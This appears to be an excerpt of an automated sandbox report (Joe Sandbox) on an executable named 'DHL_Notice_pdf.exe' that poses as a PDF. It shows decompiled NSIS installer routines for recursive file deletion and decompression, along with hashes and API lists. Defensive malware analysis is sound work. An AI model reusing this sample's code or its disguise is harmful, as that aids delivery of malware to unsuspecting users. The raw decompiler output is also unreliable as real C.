                                                            • API ID: Processlstrcat$ExitFile$Directory$CurrentDeleteEnvironmentPathTempTokenVariableVersionWindows$AdjustCharCloseCommandCopyCreateErrorHandleInfoInitializeLineLookupModeNextOpenPrivilegePrivilegesUninitializeValuelstrcmpilstrlen
                                                            • String ID: "C:\Users\user\Desktop\DHL_Notice_pdf.exe"$.tmp$1033$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\DHL_Notice_pdf.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
                                                            • API String ID: 2292928366-836459385
                                                            • Opcode ID: e0a8c6016783217a32738e87f4e0326041da0509f66f4411adb9540052cd23fd
                                                            • Instruction ID: d56582c8b11bee4b9d4e83ad1f604629a9588d533935b381636b20c84fba3529
                                                            • Opcode Fuzzy Hash: e0a8c6016783217a32738e87f4e0326041da0509f66f4411adb9540052cd23fd
                                                            • Instruction Fuzzy Hash: D4E1F471A00214AADB20AFB58D45A6E3EB8EB05709F50847FF945B32D1DB7C8A41CB6D
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Control-flow Graph

                                                            control_flow_graph 395 405d74-405d9a call 40603f 398 405db3-405dba 395->398 399 405d9c-405dae DeleteFileW 395->399 401 405dbc-405dbe 398->401 402 405dcd-405ddd call 406668 398->402 400 405f30-405f34 399->400 403 405dc4-405dc7 401->403 404 405ede-405ee3 401->404 410 405dec-405ded call 405f83 402->410 411 405ddf-405dea lstrcatW 402->411 403->402 403->404 404->400 406 405ee5-405ee8 404->406 408 405ef2-405efa call 40699e 406->408 409 405eea-405ef0 406->409 408->400 419 405efc-405f10 call 405f37 call 405d2c 408->419 409->400 414 405df2-405df6 410->414 411->414 415 405e02-405e08 lstrcatW 414->415 416 405df8-405e00 414->416 418 405e0d-405e29 lstrlenW FindFirstFileW 415->418 416->415 416->418 420 405ed3-405ed7 418->420 421 405e2f-405e37 418->421 435 405f12-405f15 419->435 436 405f28-405f2b call 4056ca 419->436 420->404 426 405ed9 420->426 423 405e57-405e6b call 406668 421->423 424 405e39-405e41 421->424 437 405e82-405e8d call 405d2c 423->437 438 405e6d-405e75 423->438 427 405e43-405e4b 424->427 428 405eb6-405ec6 FindNextFileW 424->428 426->404 427->423 431 405e4d-405e55 427->431 428->421 434 405ecc-405ecd FindClose 428->434 431->423 431->428 434->420 435->409 441 405f17-405f26 call 4056ca call 406428 435->441 436->400 446 405eae-405eb1 call 4056ca 437->446 447 405e8f-405e92 437->447 438->428 442 405e77-405e80 call 405d74 438->442 441->400 442->428 446->428 450 405e94-405ea4 call 4056ca call 406428 447->450 451 405ea6-405eac 447->451 450->428 451->428
                                                            C-Code - Quality: 98%
                                                            			E00405D74(void* __eflags, signed int _a4, signed int _a8) {
                                                            				signed int _v8;
                                                            				signed int _v12;
                                                            				short _v556;
                                                            				short _v558;
                                                            				struct _WIN32_FIND_DATAW _v604;
                                                            				signed int _t38;
                                                            				signed int _t52;
                                                            				signed int _t55;
                                                            				signed int _t62;
                                                            				void* _t64;
                                                            				signed char _t65;
                                                            				WCHAR* _t66;
                                                            				void* _t67;
                                                            				WCHAR* _t68;
                                                            				void* _t70;
                                                            
                                                            				_t65 = _a8;
                                                            				_t68 = _a4;
                                                            				_v8 = _t65 & 0x00000004;
                                                            				_t38 = E0040603F(__eflags, _t68);
                                                            				_v12 = _t38;
                                                            				if((_t65 & 0x00000008) != 0) {
                                                            					_t62 = DeleteFileW(_t68); // executed
                                                            					asm("sbb eax, eax");
                                                            					_t64 =  ~_t62 + 1;
                                                            					 *0x42a2e8 =  *0x42a2e8 + _t64;
                                                            					return _t64;
                                                            				}
                                                            				_a4 = _t65;
                                                            				_t8 =  &_a4;
                                                            				 *_t8 = _a4 & 0x00000001;
                                                            				__eflags =  *_t8;
                                                            				if( *_t8 == 0) {
                                                            					L5:
                                                            					E00406668(0x425750, _t68);
                                                            					__eflags = _a4;
                                                            					if(_a4 == 0) {
                                                            						E00405F83(_t68);
                                                            					} else {
                                                            						lstrcatW(0x425750, L"\\*.*");
                                                            					}
                                                            					__eflags =  *_t68;
                                                            					if( *_t68 != 0) {
                                                            						L10:
                                                            						lstrcatW(_t68, 0x40a014);
                                                            						L11:
                                                            						_t66 =  &(_t68[lstrlenW(_t68)]);
                                                            						_t38 = FindFirstFileW(0x425750,  &_v604); // executed
                                                            						_t70 = _t38;
                                                            						__eflags = _t70 - 0xffffffff;
                                                            						if(_t70 == 0xffffffff) {
                                                            							L26:
                                                            							__eflags = _a4;
                                                            							if(_a4 != 0) {
                                                            								_t30 = _t66 - 2;
                                                            								 *_t30 =  *(_t66 - 2) & 0x00000000;
                                                            								__eflags =  *_t30;
                                                            							}
                                                            							goto L28;
                                                            						} else {
                                                            							goto L12;
                                                            						}
                                                            						do {
                                                            							L12:
                                                            							__eflags = _v604.cFileName - 0x2e;
                                                            							if(_v604.cFileName != 0x2e) {
                                                            								L16:
                                                            								E00406668(_t66,  &(_v604.cFileName));
                                                            								__eflags = _v604.dwFileAttributes & 0x00000010;
                                                            								if(__eflags == 0) {
                                                            									_t52 = E00405D2C(__eflags, _t68, _v8);
                                                            									__eflags = _t52;
                                                            									if(_t52 != 0) {
                                                            										E004056CA(0xfffffff2, _t68);
                                                            									} else {
                                                            										__eflags = _v8 - _t52;
                                                            										if(_v8 == _t52) {
                                                            											 *0x42a2e8 =  *0x42a2e8 + 1;
                                                            										} else {
                                                            											E004056CA(0xfffffff1, _t68);
                                                            											E00406428(_t67, _t68, 0);
                                                            										}
                                                            									}
                                                            								} else {
                                                            									__eflags = (_a8 & 0x00000003) - 3;
                                                            									if(__eflags == 0) {
                                                            										E00405D74(__eflags, _t68, _a8);
                                                            									}
                                                            								}
                                                            								goto L24;
                                                            							}
                                                            							__eflags = _v558;
                                                            							if(_v558 == 0) {
                                                            								goto L24;
                                                            							}
                                                            							__eflags = _v558 - 0x2e;
                                                            							if(_v558 != 0x2e) {
                                                            								goto L16;
                                                            							}
                                                            							__eflags = _v556;
                                                            							if(_v556 == 0) {
                                                            								goto L24;
                                                            							}
                                                            							goto L16;
                                                            							L24:
                                                            							_t55 = FindNextFileW(_t70,  &_v604); // executed
                                                            							__eflags = _t55;
                                                            						} while (_t55 != 0);
                                                            						_t38 = FindClose(_t70); // executed
                                                            						goto L26;
                                                            					}
                                                            					__eflags =  *0x425750 - 0x5c;
                                                            					if( *0x425750 != 0x5c) {
                                                            						goto L11;
                                                            					}
                                                            					goto L10;
                                                            				} else {
                                                            					__eflags = _t38;
                                                            					if(_t38 == 0) {
                                                            						L28:
                                                            						__eflags = _a4;
                                                            						if(_a4 == 0) {
                                                            							L36:
                                                            							return _t38;
                                                            						}
                                                            						__eflags = _v12;
                                                            						if(_v12 != 0) {
                                                            							_t38 = E0040699E(_t68);
                                                            							__eflags = _t38;
                                                            							if(_t38 == 0) {
                                                            								goto L36;
                                                            							}
                                                            							E00405F37(_t68);
                                                            							_t38 = E00405D2C(__eflags, _t68, _v8 | 0x00000001);
                                                            							__eflags = _t38;
                                                            							if(_t38 != 0) {
                                                            								return E004056CA(0xffffffe5, _t68);
                                                            							}
                                                            							__eflags = _v8;
                                                            							if(_v8 == 0) {
                                                            								goto L30;
                                                            							}
                                                            							E004056CA(0xfffffff1, _t68);
                                                            							return E00406428(_t67, _t68, 0);
                                                            						}
                                                            						L30:
                                                            						 *0x42a2e8 =  *0x42a2e8 + 1;
                                                            						return _t38;
                                                            					}
                                                            					__eflags = _t65 & 0x00000002;
                                                            					if((_t65 & 0x00000002) == 0) {
                                                            						goto L28;
                                                            					}
                                                            					goto L5;
                                                            				}
                                                            			}



















                                                            APIs
                                                            • DeleteFileW.KERNELBASE(?,?,74D0FAA0,74D0F560,00000000), ref: 00405D9D
                                                            • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\nsd7F3D.tmp\*.*,\*.*), ref: 00405DE5
                                                            • lstrcatW.KERNEL32(?,0040A014), ref: 00405E08
                                                            • lstrlenW.KERNEL32(?,?,0040A014,?,C:\Users\user\AppData\Local\Temp\nsd7F3D.tmp\*.*,?,?,74D0FAA0,74D0F560,00000000), ref: 00405E0E
                                                            • FindFirstFileW.KERNELBASE(C:\Users\user\AppData\Local\Temp\nsd7F3D.tmp\*.*,?,?,?,0040A014,?,C:\Users\user\AppData\Local\Temp\nsd7F3D.tmp\*.*,?,?,74D0FAA0,74D0F560,00000000), ref: 00405E1E
                                                            • FindNextFileW.KERNELBASE(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405EBE
                                                            • FindClose.KERNELBASE(00000000), ref: 00405ECD
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.248820039.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.248815920.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.248830182.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.248836994.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.248836994.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.248836994.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.248836994.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.248836994.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.248873061.000000000043B000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_DHL_Notice_pdf.jbxd
                                                            Similarity
                                                            • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                            • String ID: .$.$C:\Users\user\AppData\Local\Temp\nsd7F3D.tmp\*.*$\*.*
                                                            • API String ID: 2035342205-3738162736
                                                            • Opcode ID: eb4081a649fdbb44c8907daec76b44e1c805ca5b036c6d0867ef95af4715127c
                                                            • Instruction ID: 3801e3340fbbb9c460ab277ab089a7ece50ce31247a5b640c745bca9484d7288
                                                            • Opcode Fuzzy Hash: eb4081a649fdbb44c8907daec76b44e1c805ca5b036c6d0867ef95af4715127c
                                                            • Instruction Fuzzy Hash: 46410330800A15AADB21AB61CC49BBF7678EF41715F50413FF881711D1DB7C4A82CEAE
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 98%
                                                            			E00406D5F() {
                                                            				unsigned short _t531;
                                                            				signed int _t532;
                                                            				void _t533;
                                                            				void* _t534;
                                                            				signed int _t535;
                                                            				signed int _t565;
                                                            				signed int _t568;
                                                            				signed int _t590;
                                                            				signed int* _t607;
                                                            				void* _t614;
                                                            
                                                            				L0:
                                                            				while(1) {
                                                            					L0:
                                                            					if( *(_t614 - 0x40) != 0) {
                                                            						 *(_t614 - 0x34) = 1;
                                                            						 *(_t614 - 0x84) = 7;
                                                            						_t607 =  *(_t614 - 4) + 0x180 +  *(_t614 - 0x38) * 2;
                                                            						L132:
                                                            						 *(_t614 - 0x54) = _t607;
                                                            						L133:
                                                            						_t531 =  *_t607;
                                                            						_t590 = _t531 & 0x0000ffff;
                                                            						_t565 = ( *(_t614 - 0x10) >> 0xb) * _t590;
                                                            						if( *(_t614 - 0xc) >= _t565) {
                                                            							 *(_t614 - 0x10) =  *(_t614 - 0x10) - _t565;
                                                            							 *(_t614 - 0xc) =  *(_t614 - 0xc) - _t565;
                                                            							 *(_t614 - 0x40) = 1;
                                                            							_t532 = _t531 - (_t531 >> 5);
                                                            							 *_t607 = _t532;
                                                            						} else {
                                                            							 *(_t614 - 0x10) = _t565;
                                                            							 *(_t614 - 0x40) =  *(_t614 - 0x40) & 0x00000000;
                                                            							 *_t607 = (0x800 - _t590 >> 5) + _t531;
                                                            						}
                                                            						if( *(_t614 - 0x10) >= 0x1000000) {
                                                            							L139:
                                                            							_t533 =  *(_t614 - 0x84);
                                                            							L140:
                                                            							 *(_t614 - 0x88) = _t533;
                                                            							goto L1;
                                                            						} else {
                                                            							L137:
                                                            							if( *(_t614 - 0x6c) == 0) {
                                                            								 *(_t614 - 0x88) = 5;
                                                            								goto L170;
                                                            							}
                                                            							 *(_t614 - 0x10) =  *(_t614 - 0x10) << 8;
                                                            							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
                                                            							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
                                                            							 *(_t614 - 0xc) =  *(_t614 - 0xc) << 0x00000008 |  *( *(_t614 - 0x70)) & 0x000000ff;
                                                            							goto L139;
                                                            						}
                                                            					} else {
                                                            						__eax =  *(__ebp - 0x5c) & 0x000000ff;
                                                            						__esi =  *(__ebp - 0x60);
                                                            						__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
                                                            						__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
                                                            						__ecx =  *(__ebp - 0x3c);
                                                            						__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
                                                            						__ecx =  *(__ebp - 4);
                                                            						(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
                                                            						__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
                                                            						__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                                            						 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                                            						if( *(__ebp - 0x38) >= 4) {
                                                            							if( *(__ebp - 0x38) >= 0xa) {
                                                            								_t97 = __ebp - 0x38;
                                                            								 *_t97 =  *(__ebp - 0x38) - 6;
                                                            							} else {
                                                            								 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
                                                            							}
                                                            						} else {
                                                            							 *(__ebp - 0x38) = 0;
                                                            						}
                                                            						if( *(__ebp - 0x34) == __edx) {
                                                            							__ebx = 0;
                                                            							__ebx = 1;
                                                            							L60:
                                                            							__eax =  *(__ebp - 0x58);
                                                            							__edx = __ebx + __ebx;
                                                            							__ecx =  *(__ebp - 0x10);
                                                            							__esi = __edx + __eax;
                                                            							__ecx =  *(__ebp - 0x10) >> 0xb;
                                                            							__ax =  *__esi;
                                                            							 *(__ebp - 0x54) = __esi;
                                                            							__edi = __ax & 0x0000ffff;
                                                            							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                            							if( *(__ebp - 0xc) >= __ecx) {
                                                            								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                            								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                            								__cx = __ax;
                                                            								_t216 = __edx + 1; // 0x1
                                                            								__ebx = _t216;
                                                            								__cx = __ax >> 5;
                                                            								 *__esi = __ax;
                                                            							} else {
                                                            								 *(__ebp - 0x10) = __ecx;
                                                            								0x800 = 0x800 - __edi;
                                                            								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                            								__ebx = __ebx + __ebx;
                                                            								 *__esi = __cx;
                                                            							}
                                                            							 *(__ebp - 0x44) = __ebx;
                                                            							if( *(__ebp - 0x10) >= 0x1000000) {
                                                            								L59:
                                                            								if(__ebx >= 0x100) {
                                                            									goto L54;
                                                            								}
                                                            								goto L60;
                                                            							} else {
                                                            								L57:
                                                            								if( *(__ebp - 0x6c) == 0) {
                                                            									 *(__ebp - 0x88) = 0xf;
                                                            									goto L170;
                                                            								}
                                                            								__ecx =  *(__ebp - 0x70);
                                                            								__eax =  *(__ebp - 0xc);
                                                            								 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                            								__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                            								 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                            								 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                            								_t202 = __ebp - 0x70;
                                                            								 *_t202 =  *(__ebp - 0x70) + 1;
                                                            								 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                            								goto L59;
                                                            							}
                                                            						} else {
                                                            							__eax =  *(__ebp - 0x14);
                                                            							__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                            							if(__eax >=  *(__ebp - 0x74)) {
                                                            								__eax = __eax +  *(__ebp - 0x74);
                                                            							}
                                                            							__ecx =  *(__ebp - 8);
                                                            							__ebx = 0;
                                                            							__ebx = 1;
                                                            							__al =  *((intOrPtr*)(__eax + __ecx));
                                                            							 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
                                                            							L40:
                                                            							__eax =  *(__ebp - 0x5b) & 0x000000ff;
                                                            							 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
                                                            							__ecx =  *(__ebp - 0x58);
                                                            							__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
                                                            							 *(__ebp - 0x48) = __eax;
                                                            							__eax = __eax + 1;
                                                            							__eax = __eax << 8;
                                                            							__eax = __eax + __ebx;
                                                            							__esi =  *(__ebp - 0x58) + __eax * 2;
                                                            							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                            							__ax =  *__esi;
                                                            							 *(__ebp - 0x54) = __esi;
                                                            							__edx = __ax & 0x0000ffff;
                                                            							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
                                                            							if( *(__ebp - 0xc) >= __ecx) {
                                                            								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                            								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                            								__cx = __ax;
                                                            								 *(__ebp - 0x40) = 1;
                                                            								__cx = __ax >> 5;
                                                            								__ebx = __ebx + __ebx + 1;
                                                            								 *__esi = __ax;
                                                            							} else {
                                                            								 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
                                                            								 *(__ebp - 0x10) = __ecx;
                                                            								0x800 = 0x800 - __edx;
                                                            								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
                                                            								__ebx = __ebx + __ebx;
                                                            								 *__esi = __cx;
                                                            							}
                                                            							 *(__ebp - 0x44) = __ebx;
                                                            							if( *(__ebp - 0x10) >= 0x1000000) {
                                                            								L38:
                                                            								__eax =  *(__ebp - 0x40);
                                                            								if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
                                                            									while(1) {
                                                            										if(__ebx >= 0x100) {
                                                            											break;
                                                            										}
                                                            										__eax =  *(__ebp - 0x58);
                                                            										__edx = __ebx + __ebx;
                                                            										__ecx =  *(__ebp - 0x10);
                                                            										__esi = __edx + __eax;
                                                            										__ecx =  *(__ebp - 0x10) >> 0xb;
                                                            										__ax =  *__esi;
                                                            										 *(__ebp - 0x54) = __esi;
                                                            										__edi = __ax & 0x0000ffff;
                                                            										__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                            										if( *(__ebp - 0xc) >= __ecx) {
                                                            											 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                            											 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                            											__cx = __ax;
                                                            											_t169 = __edx + 1; // 0x1
                                                            											__ebx = _t169;
                                                            											__cx = __ax >> 5;
                                                            											 *__esi = __ax;
                                                            										} else {
                                                            											 *(__ebp - 0x10) = __ecx;
                                                            											0x800 = 0x800 - __edi;
                                                            											0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                            											__ebx = __ebx + __ebx;
                                                            											 *__esi = __cx;
                                                            										}
                                                            										 *(__ebp - 0x44) = __ebx;
                                                            										if( *(__ebp - 0x10) < 0x1000000) {
                                                            											L45:
                                                            											if( *(__ebp - 0x6c) == 0) {
                                                            												 *(__ebp - 0x88) = 0xe;
                                                            												goto L170;
                                                            											}
                                                            											__ecx =  *(__ebp - 0x70);
                                                            											__eax =  *(__ebp - 0xc);
                                                            											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                            											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                            											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                            											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                            											_t155 = __ebp - 0x70;
                                                            											 *_t155 =  *(__ebp - 0x70) + 1;
                                                            											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                            										}
                                                            									}
                                                            									L53:
                                                            									_t172 = __ebp - 0x34;
                                                            									 *_t172 =  *(__ebp - 0x34) & 0x00000000;
                                                            									L54:
                                                            									__al =  *(__ebp - 0x44);
                                                            									 *(__ebp - 0x5c) =  *(__ebp - 0x44);
                                                            									L55:
                                                            									if( *(__ebp - 0x64) == 0) {
                                                            										 *(__ebp - 0x88) = 0x1a;
                                                            										goto L170;
                                                            									}
                                                            									__ecx =  *(__ebp - 0x68);
                                                            									__al =  *(__ebp - 0x5c);
                                                            									__edx =  *(__ebp - 8);
                                                            									 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                                                            									 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                            									 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                                                            									 *( *(__ebp - 0x68)) = __al;
                                                            									__ecx =  *(__ebp - 0x14);
                                                            									 *(__ecx +  *(__ebp - 8)) = __al;
                                                            									__eax = __ecx + 1;
                                                            									__edx = 0;
                                                            									_t191 = __eax %  *(__ebp - 0x74);
                                                            									__eax = __eax /  *(__ebp - 0x74);
                                                            									__edx = _t191;
                                                            									L79:
                                                            									 *(__ebp - 0x14) = __edx;
                                                            									L80:
                                                            									 *(__ebp - 0x88) = 2;
                                                            									goto L1;
                                                            								}
                                                            								if(__ebx >= 0x100) {
                                                            									goto L53;
                                                            								}
                                                            								goto L40;
                                                            							} else {
                                                            								L36:
                                                            								if( *(__ebp - 0x6c) == 0) {
                                                            									 *(__ebp - 0x88) = 0xd;
                                                            									L170:
                                                            									_t568 = 0x22;
                                                            									memcpy( *(_t614 - 0x90), _t614 - 0x88, _t568 << 2);
                                                            									_t535 = 0;
                                                            									L172:
                                                            									return _t535;
                                                            								}
                                                            								__ecx =  *(__ebp - 0x70);
                                                            								__eax =  *(__ebp - 0xc);
                                                            								 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                            								__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                            								 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                            								 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                            								_t121 = __ebp - 0x70;
                                                            								 *_t121 =  *(__ebp - 0x70) + 1;
                                                            								 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                            								goto L38;
                                                            							}
                                                            						}
                                                            					}
                                                            					L1:
                                                            					_t534 =  *(_t614 - 0x88);
                                                            					if(_t534 > 0x1c) {
                                                            						L171:
                                                            						_t535 = _t534 | 0xffffffff;
                                                            						goto L172;
                                                            					}
                                                            					switch( *((intOrPtr*)(_t534 * 4 +  &M00407602))) {
                                                            						case 0:
                                                            							if( *(_t614 - 0x6c) == 0) {
                                                            								goto L170;
                                                            							}
                                                            							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
                                                            							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
                                                            							_t534 =  *( *(_t614 - 0x70));
                                                            							if(_t534 > 0xe1) {
                                                            								goto L171;
                                                            							}
                                                            							_t538 = _t534 & 0x000000ff;
                                                            							_push(0x2d);
                                                            							asm("cdq");
                                                            							_pop(_t570);
                                                            							_push(9);
                                                            							_pop(_t571);
                                                            							_t610 = _t538 / _t570;
                                                            							_t540 = _t538 % _t570 & 0x000000ff;
                                                            							asm("cdq");
                                                            							_t605 = _t540 % _t571 & 0x000000ff;
                                                            							 *(_t614 - 0x3c) = _t605;
                                                            							 *(_t614 - 0x1c) = (1 << _t610) - 1;
                                                            							 *((intOrPtr*)(_t614 - 0x18)) = (1 << _t540 / _t571) - 1;
                                                            							_t613 = (0x300 << _t605 + _t610) + 0x736;
                                                            							if(0x600 ==  *((intOrPtr*)(_t614 - 0x78))) {
                                                            								L10:
                                                            								if(_t613 == 0) {
                                                            									L12:
                                                            									 *(_t614 - 0x48) =  *(_t614 - 0x48) & 0x00000000;
                                                            									 *(_t614 - 0x40) =  *(_t614 - 0x40) & 0x00000000;
                                                            									goto L15;
                                                            								} else {
                                                            									goto L11;
                                                            								}
                                                            								do {
                                                            									L11:
                                                            									_t613 = _t613 - 1;
                                                            									 *((short*)( *(_t614 - 4) + _t613 * 2)) = 0x400;
                                                            								} while (_t613 != 0);
                                                            								goto L12;
                                                            							}
                                                            							if( *(_t614 - 4) != 0) {
                                                            								GlobalFree( *(_t614 - 4));
                                                            							}
                                                            							_t534 = GlobalAlloc(0x40, 0x600); // executed
                                                            							 *(_t614 - 4) = _t534;
                                                            							if(_t534 == 0) {
                                                            								goto L171;
                                                            							} else {
                                                            								 *((intOrPtr*)(_t614 - 0x78)) = 0x600;
                                                            								goto L10;
                                                            							}
                                                            						case 1:
                                                            							L13:
                                                            							__eflags =  *(_t614 - 0x6c);
                                                            							if( *(_t614 - 0x6c) == 0) {
                                                            								 *(_t614 - 0x88) = 1;
                                                            								goto L170;
                                                            							}
                                                            							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
                                                            							 *(_t614 - 0x40) =  *(_t614 - 0x40) | ( *( *(_t614 - 0x70)) & 0x000000ff) <<  *(_t614 - 0x48) << 0x00000003;
                                                            							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
                                                            							_t45 = _t614 - 0x48;
                                                            							 *_t45 =  *(_t614 - 0x48) + 1;
                                                            							__eflags =  *_t45;
                                                            							L15:
                                                            							if( *(_t614 - 0x48) < 4) {
                                                            								goto L13;
                                                            							}
                                                            							_t546 =  *(_t614 - 0x40);
                                                            							if(_t546 ==  *(_t614 - 0x74)) {
                                                            								L20:
                                                            								 *(_t614 - 0x48) = 5;
                                                            								 *( *(_t614 - 8) +  *(_t614 - 0x74) - 1) =  *( *(_t614 - 8) +  *(_t614 - 0x74) - 1) & 0x00000000;
                                                            								goto L23;
                                                            							}
                                                            							 *(_t614 - 0x74) = _t546;
                                                            							if( *(_t614 - 8) != 0) {
                                                            								GlobalFree( *(_t614 - 8));
                                                            							}
                                                            							_t534 = GlobalAlloc(0x40,  *(_t614 - 0x40)); // executed
                                                            							 *(_t614 - 8) = _t534;
                                                            							if(_t534 == 0) {
                                                            								goto L171;
                                                            							} else {
                                                            								goto L20;
                                                            							}
                                                            						case 2:
                                                            							L24:
                                                            							_t553 =  *(_t614 - 0x60) &  *(_t614 - 0x1c);
                                                            							 *(_t614 - 0x84) = 6;
                                                            							 *(_t614 - 0x4c) = _t553;
                                                            							_t607 =  *(_t614 - 4) + (( *(_t614 - 0x38) << 4) + _t553) * 2;
                                                            							goto L132;
                                                            						case 3:
                                                            							L21:
                                                            							__eflags =  *(_t614 - 0x6c);
                                                            							if( *(_t614 - 0x6c) == 0) {
                                                            								 *(_t614 - 0x88) = 3;
                                                            								goto L170;
                                                            							}
                                                            							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
                                                            							_t67 = _t614 - 0x70;
                                                            							 *_t67 =  &(( *(_t614 - 0x70))[1]);
                                                            							__eflags =  *_t67;
                                                            							 *(_t614 - 0xc) =  *(_t614 - 0xc) << 0x00000008 |  *( *(_t614 - 0x70)) & 0x000000ff;
                                                            							L23:
                                                            							 *(_t614 - 0x48) =  *(_t614 - 0x48) - 1;
                                                            							if( *(_t614 - 0x48) != 0) {
                                                            								goto L21;
                                                            							}
                                                            							goto L24;
                                                            						case 4:
                                                            							goto L133;
                                                            						case 5:
                                                            							goto L137;
                                                            						case 6:
                                                            							goto L0;
                                                            						case 7:
                                                            							__eflags =  *(__ebp - 0x40) - 1;
                                                            							if( *(__ebp - 0x40) != 1) {
                                                            								__eax =  *(__ebp - 0x24);
                                                            								 *(__ebp - 0x80) = 0x16;
                                                            								 *(__ebp - 0x20) =  *(__ebp - 0x24);
                                                            								__eax =  *(__ebp - 0x28);
                                                            								 *(__ebp - 0x24) =  *(__ebp - 0x28);
